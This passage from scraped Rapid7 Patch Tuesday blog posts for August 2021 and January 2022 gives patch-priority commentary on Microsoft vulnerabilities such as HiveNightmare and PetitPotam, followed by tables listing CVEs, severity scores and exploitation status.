HiveNightmare/SeriousSAM\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934> \nWith a public proof-of-concept having been available for some time, administrators should prioritize taking action on CVE-2021-36934. Remediation for this vulnerability requires volume shadow copies for system files to be deleted. This is due to the nature of the vulnerability, as the files with the vulnerable permissions could be restored from a backup and accessed even after the patch is installed. Microsoft indicates they took caution not to delete users' backups, but the trade-off is that customers will need to do the chore themselves. We've updated [our blog post](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>) with this additional information.\n\n## Windows LSA Spoofing Vulnerability aka ADV210003\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942> \nAnother high priority action for patching teams is CVE-2021-36942. This update patches one of the vectors used in the PetitPotam attack. After applying this update there are additional configurations required in order to protect systems from other attack vectors using registry keys. The InsightVM team has included detection for the registry keys needed to enable EPA and SMB Signing in addition to the normal update. Please see [our blog post](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>) for more information.\n\n## Windows Services for NFS ONCRPC XDR Driver Remote Code Execution Vulnerability\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26432> \nWhile Microsoft has not offered up any details for this vulnerability we can glean some info from the CVSS information. This remote code execution vulnerability is reachable from the network service with no authentication or user action required. There may not be an exploit available for this yet, but Microsoft indicates that \u201cExploitation [is] more likely\u201d. Put this update near the top of your TODO list.\n\n## Windows TCP/IP Remote Code Execution Vulnerability\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26424> \nLast on our list is a vulnerability that can result in remote execution on a Hyper-V host via the IPv6 networking stack. If Hyper-V is used in your environment this should be first on your list this month. \n\n## Summary Graphs\n\n\n\n## Summary Tables\n\n## Azure Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-36949](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36949>) | Microsoft Azure Active Directory Connect Authentication Bypass Vulnerability | No | No | 7.1 | Yes \n[CVE-2021-26428](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26428>) | Azure Sphere Information Disclosure Vulnerability | No | No | 4.4 | Yes \n[CVE-2021-26429](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26429>) | Azure Sphere Elevation of Privilege Vulnerability | No | No | 7.7 | Yes \n[CVE-2021-26430](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26430>) | Azure Sphere Denial of Service Vulnerability | No | No | 6 | Yes \n[CVE-2021-33762](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33762>) | Azure CycleCloud Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-36943](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36943>) | Azure CycleCloud Elevation of Privilege Vulnerability | No | No | 4 | No \n \n## Browser Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-30597](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30597>) | Chromium: CVE-2021-30597 Use after free in Browser UI | No | No | | Yes \n[CVE-2021-30596](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30596>) | Chromium: CVE-2021-30596 Incorrect security UI in Navigation | No | No | | Yes \n[CVE-2021-30594](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30594>) | Chromium: CVE-2021-30594 Use after free in Page Info UI | No | No | | Yes \n[CVE-2021-30593](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30593>) | Chromium: CVE-2021-30593 Out of bounds read in Tab Strip | No | No | | Yes \n[CVE-2021-30592](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30592>) | Chromium: CVE-2021-30592 Out of bounds write in Tab Groups | No | No | | Yes \n[CVE-2021-30591](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30591>) | Chromium: CVE-2021-30591 Use after free in File System API | No | No | | Yes \n[CVE-2021-30590](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30590>) | Chromium: CVE-2021-30590 Heap buffer overflow in Bookmarks | No | No | | Yes \n \n## Developer Tools Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-34532](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34532>) | ASP.NET Core and Visual Studio Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-34485](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34485>) | .NET Core and Visual Studio Information Disclosure Vulnerability | No | No | 5 | Yes \n[CVE-2021-26423](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26423>) | .NET Core and Visual Studio Denial of Service Vulnerability | No | No | 7.5 | No \n \n## Microsoft Dynamics Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-36946](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36946>) | Microsoft Dynamics Business Central Cross-site Scripting Vulnerability | No | No | 5.4 | No \n[CVE-2021-34524](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34524>) | Microsoft Dynamics 365 (on-premises) Remote Code Execution Vulnerability | No | No | 8.1 | No \n[CVE-2021-36950](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36950>) | Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability | No | No | 5.4 | No \n \n## Microsoft Office Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-36941](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36941>) | Microsoft Word Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-36940](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36940>) | Microsoft SharePoint Server Spoofing Vulnerability | No | No | 7.6 | No \n[CVE-2021-34478](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34478>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## System Center Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-34471](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34471>) | Microsoft Windows Defender Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n \n## Windows Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26426](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26426>) | Windows User Account Profile Picture Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-36948](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36948>) | Windows Update Medic Service Elevation of Privilege Vulnerability | Yes | No | 7.8 | No \n[CVE-2021-26432](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26432>) | Windows Services for NFS ONCRPC XDR Driver Remote Code Execution Vulnerability | No | No | 9.8 | No \n[CVE-2021-26433](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26433>) | Windows Services for NFS ONCRPC XDR Driver Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-36926](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36926>) | Windows Services for NFS ONCRPC XDR Driver Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-36932](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36932>) | Windows Services for NFS ONCRPC XDR Driver Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-36933](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36933>) | Windows Services for NFS ONCRPC XDR Driver Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-26431](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26431>) | Windows Recovery Environment Agent Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34534](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34534>) | Windows MSHTML Platform Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2021-34530](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34530>) | Windows Graphics Component Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-34486](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34486>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34487](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34487>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-36938](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36938>) | Windows Cryptographic Primitives Library Information Disclosure Vulnerability | No | No | 5.5 | No \n[CVE-2021-36945](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36945>) | Windows 10 Update Assistant Elevation of Privilege Vulnerability | No | No | 7.3 | No \n[CVE-2021-34536](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34536>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No \n \n## Windows ESU Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-34484](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34484>) | Windows User Profile Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26424](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26424>) | Windows TCP/IP Remote Code Execution Vulnerability | No | No | 9.9 | Yes \n[CVE-2021-36936](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36936>) | Windows Print Spooler Remote Code Execution Vulnerability | No | Yes | 8.8 | No \n[CVE-2021-36947](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36947>) | Windows Print Spooler Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-34483](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34483>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-36937](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36937>) | Windows Media MPEG-4 Video Decoder Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-36942](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36942>) | Windows LSA Spoofing Vulnerability | No | Yes | 7.5 | Yes \n[CVE-2021-34533](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34533>) | Windows Graphics Component Font Parsing Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-26425](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26425>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-36927](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36927>) | Windows Digital TV Tuner device registration application Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34537](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34537>) | Windows Bluetooth Driver Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-34480](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34480>) | Scripting Engine Memory Corruption Vulnerability | No | No | 6.8 | Yes \n[CVE-2021-34535](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34535>) | Remote Desktop Client Remote Code Execution Vulnerability | No | No | 8.8 | Yes", "cvss3": {}, "published": "2021-08-11T03:19:33", "type": "rapid7blog", "title": "Patch Tuesday - August 2021", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26423", "CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26428", "CVE-2021-26429", "CVE-2021-26430", "CVE-2021-26431", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-30590", "CVE-2021-30591", "CVE-2021-30592", "CVE-2021-30593", "CVE-2021-30594", "CVE-2021-30596", "CVE-2021-30597", "CVE-2021-33762", "CVE-2021-34471", "CVE-2021-34478", "CVE-2021-34480", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34485", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34524", "CVE-2021-34530", "CVE-2021-34532", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36927", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36934", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36940", "CVE-2021-36941", "CVE-2021-36942", "CVE-2021-36943", "CVE-2021-36945", "CVE-2021-36946", "CVE-2021-36947", "CVE-2021-36948", "CVE-2021-36949", "CVE-2021-36950"], "modified": "2021-08-11T03:19:33", "id": "RAPID7BLOG:DE426F8A59CA497BB6C0B90C0F1849CD", "href": "https://blog.rapid7.com/2021/08/11/patch-tuesday-august-2021/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-18T23:27:22", "description": "\n\nThe first Patch Tuesday of 2022 sees Microsoft publishing fixes for over 120 CVEs across the bulk of their product line, including 29 previously patched CVEs affecting their Edge browser via Chromium. None of these have yet been seen exploited in the wild, though six were publicly disclosed prior to today. This includes two Remote Code Execution (RCE) vulnerabilities in open source libraries that are bundled with more recent versions of Windows: [CVE-2021-22947](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-22947>), which affects the curl library, and [CVE-2021-36976](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36976>) which affects libarchive.\n\nThe majority of this month\u2019s patched vulnerabilities, such as [CVE-2022-21857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21857>) (affecting Active Directory Domain Services), allow attackers to elevate their privileges on systems or networks they already have a foothold in. \n\n### Critical RCEs\n\nBesides [CVE-2021-22947](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-22947>) (libcurl), several other Critical RCE vulnerabilities were also fixed. Most of these have caveats that reduce their scariness to some degree. The worst of these is [CVE-2021-21907](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907>), affecting the Windows HTTP protocol stack. Although it carries a CVSSv3 base score of 9.8 and is considered potentially \u201cwormable\u201d by Microsoft, similar vulnerabilities have not proven to be rampantly exploited (see the AttackerKB analysis for [CVE-2021-31166](<https://attackerkb.com/topics/pZcouFxeCW/cve-2021-31166/rapid7-analysis>)).\n\nNot quite as bad is [CVE-2022-21840](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21840>), which affects all supported versions of Office, as well as Sharepoint Server. Exploitation would require social engineering to entice a victim to open an attachment or visit a malicious website \u2013 thankfully the Windows preview pane is not a vector for this attack.\n\n[CVE-2022-21846](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21846>) affects Exchange Server, but cannot be exploited directly over the public internet (attackers need to be \u201cadjacent\u201d to the target system in terms of network topology). This restriction also applies to [CVE-2022-21855](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21855>) and [CVE-2022-21969](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21969>), two less severe RCEs in Exchange this month.\n\n[CVE-2022-21912](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21912>) and [CVE-2022-21898](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21898>) both affect DirectX Graphics and require local access. [CVE-2022-21917](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21917>) is a vulnerability in the Windows Codecs library. In most cases, systems should automatically get patched; however, some organizations may have the vulnerable codec preinstalled on their gold images and disable Windows Store updates.\n\nDefenders should prioritize patching servers (Exchange, Sharepoint, Hyper-V, and IIS) followed by web browsers and other client software.\n\n## Summary charts\n\n\n\n## Summary tables\n\n### Browser vulnerabilities\n\nCVE | Title | Exploited | Publicly disclosed | CVSSv3 base | Additional FAQ \n---|---|---|---|---|--- \n[CVE-2022-21930](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21930>) | Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability | No | No | 4.2 | Yes \n[CVE-2022-21931](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21931>) | Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability | No | No | 4.2 | Yes \n[CVE-2022-21929](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21929>) | Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability | No | No | 2.5 | Yes \n[CVE-2022-21954](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21954>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 6.1 | Yes \n[CVE-2022-21970](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21970>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 6.1 | Yes \n[CVE-2022-0120](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0120>) | Chromium: CVE-2022-0120 Inappropriate implementation in Passwords | No | No | nan | Yes \n[CVE-2022-0118](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0118>) | Chromium: CVE-2022-0118 Inappropriate implementation in WebShare | No | No | nan | Yes \n[CVE-2022-0117](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0117>) | Chromium: CVE-2022-0117 Policy bypass in Service Workers | No | No | nan | Yes \n[CVE-2022-0116](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0116>) | Chromium: CVE-2022-0116 Inappropriate implementation in Compositing | No | No | nan | Yes \n[CVE-2022-0115](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0115>) | Chromium: CVE-2022-0115 Uninitialized Use in File API | No | No | nan | Yes \n[CVE-2022-0114](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0114>) | Chromium: CVE-2022-0114 Out of bounds memory access in Web Serial | No | No | nan | Yes \n[CVE-2022-0113](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0113>) | Chromium: CVE-2022-0113 Inappropriate implementation in Blink | No | No | nan | Yes \n[CVE-2022-0112](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0112>) | Chromium: CVE-2022-0112 Incorrect security UI in Browser UI | No | No | nan | Yes \n[CVE-2022-0111](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0111>) | Chromium: CVE-2022-0111 Inappropriate implementation in Navigation | No | No | nan | Yes \n[CVE-2022-0110](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0110>) | Chromium: CVE-2022-0110 Incorrect security UI in Autofill | No | No | nan | Yes \n[CVE-2022-0109](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0109>) | Chromium: CVE-2022-0109 Inappropriate implementation in Autofill | No | No | nan | Yes \n[CVE-2022-0108](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0108>) | Chromium: CVE-2022-0108 Inappropriate implementation in Navigation | No | No | nan | Yes \n[CVE-2022-0107](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0107>) | Chromium: CVE-2022-0107 Use after free in File Manager API | No | No | nan | Yes \n[CVE-2022-0106](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0106>) | Chromium: CVE-2022-0106 Use after free in Autofill | No | No | nan | Yes \n[CVE-2022-0105](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0105>) | Chromium: CVE-2022-0105 Use after free in PDF | No | No | nan | Yes \n[CVE-2022-0104](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0104>) | Chromium: CVE-2022-0104 Heap buffer overflow in ANGLE | No | No | nan | Yes \n[CVE-2022-0103](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0103>) | Chromium: CVE-2022-0103 Use after free in SwiftShader | No | No | nan | Yes \n[CVE-2022-0102](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0102>) | Chromium: CVE-2022-0102 Type Confusion in V8 | No | No | nan | Yes \n[CVE-2022-0101](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0101>) | Chromium: CVE-2022-0101 Heap buffer overflow in Bookmarks | No | No | nan | Yes \n[CVE-2022-0100](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0100>) | Chromium: CVE-2022-0100 Heap buffer overflow in Media streams API | No | No | nan | Yes \n[CVE-2022-0099](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0099>) | Chromium: CVE-2022-0099 Use after free in Sign-in | No | No | nan | Yes \n[CVE-2022-0098](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0098>) | Chromium: CVE-2022-0098 Use after free in Screen Capture | No | No | nan | Yes \n[CVE-2022-0097](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0097>) | Chromium: CVE-2022-0097 Inappropriate implementation in DevTools | No | No | nan | Yes \n[CVE-2022-0096](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0096>) | Chromium: CVE-2022-0096 Use after free in Storage | No | No | nan | Yes \n \n### Developer Tools vulnerabilities\n\nCVE | Title | Exploited | Publicly disclosed | CVSSv3 base | Additional FAQ \n---|---|---|---|---|--- \n[CVE-2022-21911](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21911>) | .NET Framework Denial of Service Vulnerability | No | No | 7.5 | No \n \n### ESU Windows vulnerabilities\n\nCVE | Title | Exploited | Publicly disclosed | CVSSv3 base | Additional FAQ \n---|---|---|---|---|--- \n[CVE-2022-21924](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21924>) | Workstation Service Remote Protocol Security Feature Bypass Vulnerability | No | No | 5.3 | No \n[CVE-2022-21834](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21834>) | Windows User-mode Driver Framework Reflector Driver Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21919](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21919>) | Windows User Profile Service Elevation of Privilege Vulnerability | No | Yes | 7 | No \n[CVE-2022-21885](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21885>) | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21914](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21914>) | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-21920](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21920>) | Windows Kerberos Elevation of Privilege Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-21908](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21908>) | Windows Installer Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21843](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21843>) | Windows IKE Extension Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-21883](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21883>) | Windows IKE Extension Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-21848](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21848>) | Windows IKE Extension Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-21889](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21889>) | Windows IKE Extension Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-21890](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21890>) | Windows IKE Extension Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-21900](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21900>) | Windows Hyper-V Security Feature Bypass Vulnerability | No | No | 4.6 | Yes \n[CVE-2022-21905](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21905>) | Windows Hyper-V Security Feature Bypass Vulnerability | No | No | 4.6 | Yes \n[CVE-2022-21880](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21880>) | Windows GDI+ Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-21915](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21915>) | Windows GDI+ Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-21904](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21904>) | Windows GDI Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-21903](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21903>) | Windows GDI Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21899](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21899>) | Windows Extensible Firmware Interface Security Feature Bypass Vulnerability | No | No | 5.5 | No \n[CVE-2022-21916](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21916>) | Windows Common Log File System Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21897](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21897>) | Windows Common Log File System Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21838](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21838>) | Windows Cleanup Manager Elevation of Privilege Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-21836](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21836>) | Windows Certificate Spoofing Vulnerability | No | Yes | 7.8 | Yes \n[CVE-2022-21925](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21925>) | Windows BackupKey Remote Protocol Security Feature Bypass Vulnerability | No | No | 5.3 | No \n[CVE-2022-21862](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21862>) | Windows Application Model Core API Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21859](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21859>) | Windows Accounts Control Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21833](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21833>) | Virtual Machine IDE Drive Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21922](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21922>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-21893](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21893>) | Remote Desktop Protocol Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-21850](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21850>) | Remote Desktop Client Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-21851](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21851>) | Remote Desktop Client Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-21835](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21835>) | Microsoft Cryptographic Services Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21884](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21884>) | Local Security Authority Subsystem Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21913](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21913>) | Local Security Authority (Domain Policy) Remote Protocol Security Feature Bypass | No | No | 5.3 | No \n[CVE-2022-21857](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21857>) | Active Directory Domain Services Elevation of Privilege Vulnerability | No | No | 8.8 | Yes \n \n### Exchange Server vulnerabilities\n\nCVE | Title | Exploited | Publicly disclosed | CVSSv3 base | Additional FAQ \n---|---|---|---|---|--- \n[CVE-2022-21846](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21846>) | Microsoft Exchange 